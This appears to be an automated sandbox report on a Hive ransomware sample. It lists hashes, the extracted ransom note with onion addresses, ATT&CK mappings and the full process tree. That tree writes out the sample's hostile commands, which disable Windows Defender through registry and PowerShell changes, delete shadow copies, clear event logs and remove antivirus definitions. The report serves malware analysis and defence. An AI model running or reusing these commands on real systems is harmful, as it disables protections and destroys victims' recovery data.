Overview

overview

10

Static

static

3

2025-03-07...ch.exe

windows7-x64

10

2025-03-07...ch.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07/03/2025, 02:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-03-07_760ccfdb30fe7eaab9cd4c7450d73c24_frostygoop_hive_sliver_snatch.exe

  • Size

    2.5MB

  • MD5

    760ccfdb30fe7eaab9cd4c7450d73c24

  • SHA1

    5eb8513686554a871a8dea173f0c175eeec74f38

  • SHA256

    2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709

  • SHA512

    25050f6fa163acec8de703210439d004ce1a752dea70ca6c7daea8c5d19c46647f573e1934609e5aeeee787dd6ef180701304f9f695fa30193f2d9704aaaa5c5

  • SSDEEP

    24576:pT6Gyv2Cc+qVzsnjRaPTbGQtIYph4qDqz15QAml7+GgEEtKBM7i4ArwRV6LUEFga:pCXo8m04Td2xDoCLyv1D1

Score
10/10
hivedefense_evasiondiscoveryevasionexecutionimpactransomwarespywarestealertrojan

Malware Config

Extracted

Path

C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\UZEP_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note
Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: zo6NZMEhyHgb Password: Ao1KMM8jU6P2DgkuhXqN To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.gtqbv files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.
URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

    defense_evasion
  • Disables service(s) 3 TTPs
    defense_evasionexecution
  • Hive

    A ransomware written in Golang first seen in June 2021.

    ransomwarehive
  • Hive family
    hive
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
    defense_evasiontrojan
  • Modifies security service 2 TTPs 1 IoCs
    defense_evasion
  • Clears Windows event logs 1 TTPs 3 IoCs
    defense_evasionransomware
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Modifies Security services 2 TTPs 6 IoCs

    Modifies the startup behavior of a security service.

    defense_evasion
  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-07_760ccfdb30fe7eaab9cd4c7450d73c24_frostygoop_hive_sliver_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-07_760ccfdb30fe7eaab9cd4c7450d73c24_frostygoop_hive_sliver_snatch.exe"
    1⤵
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1944
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "NetMsmqActivator" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2328
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "NetMsmqActivator" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2348
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SamSs" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2396
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SamSs" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1568
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SDRSVC" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1964
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SDRSVC" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2244
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SstpSvc" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2756
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SstpSvc" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2832
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "UI0Detect" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2836
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "UI0Detect" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3004
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "VSS" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2768
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "VSS" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1736
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "wbengine" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2852
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "wbengine" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2804
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "WebClient" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2624
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "WebClient" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2848
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "NetMsmqActivator" start= disabled
      2⤵
      • Launches sc.exe
      PID:2776
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "SamSs" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2976
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "SDRSVC" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2332
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "SstpSvc" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2812
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "UI0Detect" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2612
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "VSS" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2668
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "wbengine" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:3068
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "WebClient" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2312
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      • Modifies Security services
      • System Location Discovery: System Language Discovery
      PID:1012
    • C:\Windows\SysWOW64\reg.exe
      reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:640
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender DisableAntiSpyware settings
      • System Location Discovery: System Language Discovery
      PID:2960
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2948
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:380
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • System Location Discovery: System Language Discovery
      PID:320
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • System Location Discovery: System Language Discovery
      PID:1200
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • System Location Discovery: System Language Discovery
      PID:2604
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • System Location Discovery: System Language Discovery
      PID:2704
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      PID:2964
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1428
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2336
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:768
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:324
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1684
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2656
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2164
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2112
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2536
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2928
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      2⤵
        PID:2552
      • C:\Windows\SysWOW64\reg.exe
        reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
        2⤵
          PID:1112
        • C:\Windows\SysWOW64\reg.exe
          reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1796
        • C:\Windows\SysWOW64\reg.exe
          reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2712
        • C:\Windows\SysWOW64\reg.exe
          reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:948
        • C:\Windows\SysWOW64\reg.exe
          reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:796
        • C:\Windows\SysWOW64\reg.exe
          reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:816
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
          2⤵
          • Modifies Security services
          • System Location Discovery: System Language Discovery
          PID:3016
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
          2⤵
          • Modifies Security services
          • System Location Discovery: System Language Discovery
          PID:3020
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
          2⤵
          • Modifies Security services
          PID:2564
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
          2⤵
          • Modifies Security services
          • System Location Discovery: System Language Discovery
          PID:2940
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
          2⤵
          • Modifies security service
          • System Location Discovery: System Language Discovery
          PID:1640
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
          2⤵
          • Modifies Security services
          PID:1560
        • C:\Windows\SysWOW64\vssadmin.exe
          vssadmin.exe delete shadows /all /quiet
          2⤵
          • System Location Discovery: System Language Discovery
          • Interacts with shadow copies
          PID:2040
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil.exe cl system
          2⤵
          • Clears Windows event logs
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:1404
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil.exe cl security
          2⤵
          • Clears Windows event logs
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:1772
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil.exe cl application
          2⤵
          • Clears Windows event logs
          • Suspicious use of AdjustPrivilegeToken
          PID:2104
        • C:\Windows\SysWOW64\Wbem\wmic.exe
          wmic.exe SHADOWCOPY /nointeractive
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:1548
        • C:\Windows\SysWOW64\Wbem\wmic.exe
          wmic.exe shadowcopy delete
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:2156
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1224
          • C:\Program Files\Windows Defender\MpCmdRun.exe
            "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
            3⤵
            • Deletes Windows Defender Definitions
            PID:1764
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
          2⤵
            PID:2136
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableIOAVProtection $true
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2996
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
            2⤵
            • System Location Discovery: System Language Discovery
            PID:1204
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableRealtimeMonitoring $true
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2348
          • C:\Windows\SysWOW64\notepad.exe
            notepad.exe C:\UZEP_HOW_TO_DECRYPT.txt
            2⤵
            • System Location Discovery: System Language Discovery
            • Opens file in notepad (likely ransom note)
            PID:2100
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\2025-03-07_760ccfdb30fe7eaab9cd4c7450d73c24_frostygoop_hive_sliver_snatch.exe"
            2⤵
            • Deletes itself
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            PID:1928
            • C:\Windows\SysWOW64\PING.EXE
              ping.exe -n 5 127.0.0.1
              3⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:1504

        Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Command and Scripting Interpreter

        2
        T1059

        PowerShell

        1
        T1059.001

        System Services

        1
        T1569

        Service Execution

        1
        T1569.002

        Windows Management Instrumentation

        1
        T1047

        Persistence

        Create or Modify System Process

        4
        T1543

        Windows Service

        4
        T1543.003

        Privilege Escalation

        Create or Modify System Process

        4
        T1543

        Windows Service

        4
        T1543.003

        Defense Evasion

        Direct Volume Access

        1
        T1006

        Impair Defenses

        4
        T1562

        Disable or Modify Tools

        2
        T1562.001

        Indicator Removal

        3
        T1070

        Clear Windows Event Logs

        1
        T1070.001

        File Deletion

        2
        T1070.004

        Modify Registry

        4
        T1112

        Credential Access

        Credentials from Password Stores

        1
        T1555

        Credentials from Web Browsers

        1
        T1555.003

        Unsecured Credentials

        1
        T1552

        Credentials In Files

        1
        T1552.001

        Discovery

        Remote System Discovery

        1
        T1018

        System Location Discovery

        1
        T1614

        System Language Discovery

        1
        T1614.001

        System Network Configuration Discovery

        1
        T1016

        Internet Connection Discovery

        1
        T1016.001

        Lateral Movement

        Collection

        Data from Local System

        1
        T1005

        Command and Control

        Exfiltration

        Impact

        Inhibit System Recovery

        2
        T1490

        Service Stop

        1
        T1489

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\UZEP_HOW_TO_DECRYPT.txt
          Filesize

          1KB

          MD5

          c4bfe3cc5113f57dc2e5b89c7374e048

          SHA1

          3a43c21e9401fb7d6d9cd3941aa853eb407b0b6b

          SHA256

          4dedc0a2be54c954d754e5e597b72bb54fdd706a0039b01b0ff9107fe4c10acb

          SHA512

          e8dbc2b6f7142cf9ba075861026edf795ea5f6bd852e286fce821ada6f2caf4dc7ba7ecafe44a1b0dc937ab7dc67d8ea787d6518c9ee67db8b88b1557ff847c3

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
          Filesize

          7KB

          MD5

          980f088459f27863ff6018d447b359dd

          SHA1

          2d379a473ade9d98eea6e7119c299399a1436f2d

          SHA256

          0e9f803e38ee8d764abe1c6312827b046720d10f0a30eb9c0e9a40ed742c212c

          SHA512

          31caa343605eb9a11dce64e0a9ece0b2060e368a7210fa246cf5df481588124a54b0c9847785203b3e06ff86ba3cd44532488b75cc905d7b728cec00c67f6ce9

          Download Submit